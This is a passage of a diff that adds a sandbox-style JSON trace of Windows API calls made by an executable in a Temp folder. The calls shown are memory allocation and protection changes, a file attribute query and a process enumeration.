true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00777000" + }, + { + "name": "RegionSize", + "value": "0x00009000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 436 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00780000" + }, + { + "name": "RegionSize", + "value": "0x00009000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 437 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00789000" + }, + { + "name": "RegionSize", + "value": "0x00009000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 438 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00792000" + }, + { + "name": "RegionSize", + "value": "0x00011000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 439 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x007a3000" + }, + { + "name": "RegionSize", + "value": "0x00011000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 440 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x007b4000" + }, + { + "name": "RegionSize", + "value": "0x00011000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 441 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x007c5000" + }, + { + "name": "RegionSize", + "value": "0x00011000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 442 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x007d6000" + }, + { + "name": "RegionSize", + "value": "0x00021000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 443 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04d40000" + }, + { + "name": "RegionSize", + "value": "0x00100000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 444 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04d40000" + }, + { + "name": "RegionSize", + "value": "0x00022000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 445 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04d62000" + }, + { + "name": "RegionSize", + "value": "0x00021000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 446 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04d83000" + }, + { + "name": "RegionSize", + "value": "0x00021000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 447 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04da4000" + }, + { + "name": "RegionSize", + "value": "0x00043000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 448 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04de1000" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000001", + "pretty_value": "PAGE_NOACCESS" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 449 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04de7000" + }, + { + "name": "RegionSize", + "value": "0x00043000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 450 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce29fc", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04e23000" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000001", + "pretty_value": "PAGE_NOACCESS" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 451 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce2a69", + "parentcaller": "0x03ce2415", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + } + ], + "repeated": 0, + "id": 452 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce4bab", + "parentcaller": "0x03ce4176", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x75ea6000" + }, + { + "name": "ModuleName", + "value": "SHELL32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 453 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce4bab", + "parentcaller": "0x03ce4176", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x75ea6000" + }, + { + "name": "ModuleName", + "value": "SHELL32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 454 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce5b0f", + "parentcaller": "0x03ce4925", + "category": "filesystem", + "api": "NtCreateFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000320" + }, + { + "name": "DesiredAccess", + "value": "0x00100080", + "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe" + }, + { + "name": "CreateDisposition", + "value": "1", + "pretty_value": "FILE_OPEN" + }, + { + "name": "ShareAccess", + "value": "1", + "pretty_value": "FILE_SHARE_READ" + }, + { + "name": "FileAttributes", + "value": "0x00000000" + }, + { + "name": "ExistedBefore", + "value": "yes" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 455 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce5b68", + "parentcaller": "0x03ce4925", + "category": "filesystem", + "api": "NtQueryInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000320" + }, + { + "name": "HandleName", + "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe" + }, + { + "name": "FileInformationClass", + "value": "4", + "pretty_value": "FileBasicInformation" + }, + { + "name": "FileInformation", + "value": "~ky\\xae\\x12~\\xdb\\x01\\xef`A\\x83\\xa8\\x8f\\xdb\\x01j2~\\xae\\x12~\\xdb\\x01j2~\\xae\\x12~\\xdb\\x01 \\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 456 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce5b90", + "parentcaller": "0x03ce4925", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + } + ], + "repeated": 0, + "id": 457 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce5baa", + "parentcaller": "0x03ce4925", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 458 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce36cc", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "CreateToolhelp32Snapshot", + "status": true, + "return": "0x00000320", + "arguments": [ + { + "name": "Flags", + "value": "0x00000002", + "pretty_value": "TH32CS_SNAPPROCESS" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 459 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32FirstW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "[System Process]" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 460 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "System" + }, + { + "name": "ProcessId", + "value": "4" + } + ], + "repeated": 0, + "id": 461 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "Registry" + }, + { + "name": "ProcessId", + "value": "92" + } + ], + "repeated": 0, + "id": 462 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "smss.exe" + }, + { + "name": "ProcessId", + "value": "328" + } + ], + "repeated": 0, + "id": 463 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "csrss.exe" + }, + { + "name": "ProcessId", + "value": "428" + } + ], + "repeated": 0, + "id": 464 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "wininit.exe" + }, + { + "name": "ProcessId", + "value": "504" + } + ], + "repeated": 0, + "id": 465 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "csrss.exe" + }, + { + "name": "ProcessId", + "value": "516" + } + ], + "repeated": 0, + "id": 466 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "winlogon.exe" + }, + { + "name": "ProcessId", + "value": "600" + } + ], + "repeated": 0, + "id": 467 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "services.exe" + }, + { + "name": "ProcessId", + "value": "640" + } + ], + "repeated": 0, + "id": 468 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "lsass.exe" + }, + { + "name": "ProcessId", + "value": "660" + } + ], + "repeated": 0, + "id": 469 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "fontdrvhost.exe" + }, + { + "name": "ProcessId", + "value": "752" + } + ], + "repeated": 0, + "id": 470 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "fontdrvhost.exe" + }, + { + "name": "ProcessId", + "value": "760" + } + ], + "repeated": 0, + "id": 471 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "768" + } + ], + "repeated": 0, + "id": 472 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "880" + } + ], + "repeated": 0, + "id": 473 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "932" + } + ], + "repeated": 0, + "id": 474 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dwm.exe" + }, + { + "name": "ProcessId", + "value": "1004" + } + ], + "repeated": 0, + "id": 475 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "520" + } + ], + "repeated": 0, + "id": 476 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "696" + } + ], + "repeated": 0, + "id": 477 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "844" + } + ], + "repeated": 0, + "id": 478 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1100" + } + ], + "repeated": 0, + "id": 479 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1120" + } + ], + "repeated": 0, + "id": 480 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1140" + } + ], + "repeated": 0, + "id": 481 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1152" + } + ], + "repeated": 0, + "id": 482 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1172" + } + ], + "repeated": 0, + "id": 483 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1224" + } + ], + "repeated": 0, + "id": 484 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1328" + } + ], + "repeated": 0, + "id": 485 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1392" + } + ], + "repeated": 0, + "id": 486 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1400" + } + ], + "repeated": 0, + "id": 487 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1492" + } + ], + "repeated": 0, + "id": 488 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1604" + } + ], + "repeated": 0, + "id": 489 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1612" + } + ], + "repeated": 0, + "id": 490 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1636" + } + ], + "repeated": 0, + "id": 491 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "Memory Compression" + }, + { + "name": "ProcessId", + "value": "1700" + } + ], + "repeated": 0, + "id": 492 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1712" + } + ], + "repeated": 0, + "id": 493 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1736" + } + ], + "repeated": 0, + "id": 494 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1776" + } + ], + "repeated": 0, + "id": 495 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1784" + } + ], + "repeated": 0, + "id": 496 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1864" + } + ], + "repeated": 0, + "id": 497 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1940" + } + ], + "repeated": 0, + "id": 498 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1988" + } + ], + "repeated": 0, + "id": 499 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2020" + } + ], + "repeated": 0, + "id": 500 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2040" + } + ], + "repeated": 0, + "id": 501 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + 